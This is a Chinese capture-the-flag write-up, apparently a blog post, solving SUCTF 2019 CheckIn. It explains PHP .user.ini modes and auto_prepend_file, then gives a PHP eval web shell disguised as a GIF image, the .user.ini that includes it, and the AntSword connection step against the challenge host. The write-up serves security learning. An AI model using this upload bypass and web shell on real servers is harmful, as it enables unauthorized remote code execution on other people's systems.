[SUCTF 2019]CheckIn(.user.ini)

知识点:

.user.ini文件

在这里插入图片描述
PHP_INI_*模式的定义

模式含义
PHP_INI_USER可在用户脚本(例如 ini_set())或 Windows 注册表(自 PHP 5.3 起)以及 .user.ini 中设定
PHP_INI_PERDIR可在 php.ini,.htaccess 或 httpd.conf 中设定
PHP_INI_SYSTEM可在 php.ini 或 httpd.conf 中设定
PHP_INI_ALL可在任何地方设定

也就是说.user.ini是由用户自定义的。

虽然许多敏感的配置项,都基本是PHP_INI_SYSTEM模式的,但是仍然可以利用.user.ini文件来构造一个后门。

利用的配置项:
auto_prepend_file 指定一个文件,自动包含在要执行的文件前
auto_append_file 指定一个文件,自动包含在要执行的文件后

使用该设置,比较灵活,不需要重启服务器,也不需要管理员权限,唯一缺点是目录中每个被读取和被解释的文件每次都要进行处理,而不是在启动时处理一次,所以性能会有所降低。

于是我们就可以用这两个配置来包含木马文件,当我们访问index.php时,就会自动的包含木马文件。


解题:

先写一个木马文件a.jpg,因为限制了是img,且将木马后缀改为jpg上传失败,应该是检测了文件头,于是加上文件头GIF89a,上传成功。
在这里插入图片描述

GIF89a
<script language="PHP"> @eval($_POST['pass']); </script>

然后创建一个.user.ini文件,在里面写上配置项,包含我们要上传的木马文件a.jpg
在这里插入图片描述

GIF89a
auto_prepend_file=a.jpg

然后将两个文件上传:
在这里插入图片描述
可以看到在上传路径uploads/76d9f00467e5ee6abc3ca60892ef304e上有我们上传的两个文件和index.php

蚁剑链接:

http://45fbbdef-40b8-4f6e-bbfd-14816eb8dd19.node3.buuoj.cn/uploads/76d9f00467e5ee6abc3ca60892ef304e/index.php

在这里插入图片描述在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值